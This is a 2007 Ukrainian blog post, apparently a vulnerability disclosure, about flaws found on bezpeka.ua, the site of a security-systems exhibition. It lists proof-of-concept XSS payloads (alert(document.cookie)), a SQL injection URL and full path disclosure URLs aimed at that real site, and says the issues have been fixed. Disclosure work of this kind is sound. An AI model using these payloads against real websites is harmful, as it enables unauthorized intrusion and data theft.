Уразливості на www.bezpeka.ua

19:09 14.08.2007

27.03.2007

У листопаді, 29.11.2006, я знайшов численні уразливості на http://www.bezpeka.ua - сайті виставки Безпека - найбільшої в Україні виставки технічних систем безпеки. Це Cross-Site Scripting, SQL Injection та Full path disclosure уразливості. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

14.08.2007

XSS:

alert(document.cookie)
alert(document.cookie)
alert(document.cookie)

SQL Injection:

http://www.bezpeka.ua/index.php?ide=34&news=488%20or%201=1

Full path disclosure:

http://www.bezpeka.ua/index.php?ide=-63

http://www.bezpeka.ua/index.php?ide=34&news=488-

Дані уразливості вже виправлені.

This entry was posted on 19:09 14.08.2007 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Останні повідомлення

Уразливості в плагінах для WordPress №9

ФБР: До ботнет мереж підключені понад мільйон комп’ютерів

Уразливості на www.uaportal.com

Добірка експлоітів

Уразливість на blog.i.ua

Численні уразливості в Microsoft Internet Explorer

MustLive Perl Pascal Programs Interpreter 10dd

Добірка уразливостей

Нові уразливості в Power Phlogger

Підвищення привілеїв у Microsoft Internet Information Services

Архів

Лютий 2008

Січень 2008

Грудень 2007

Листопад 2007

Жовтень 2007

Вересень 2007

Серпень 2007

Липень 2007

Червень 2007

Травень 2007

Квітень 2007

Березень 2007

Лютий 2007

Січень 2007

Грудень 2006

Листопад 2006

Жовтень 2006

Вересень 2006

Серпень 2006

Липень 2006

Websecurity - Веб безпека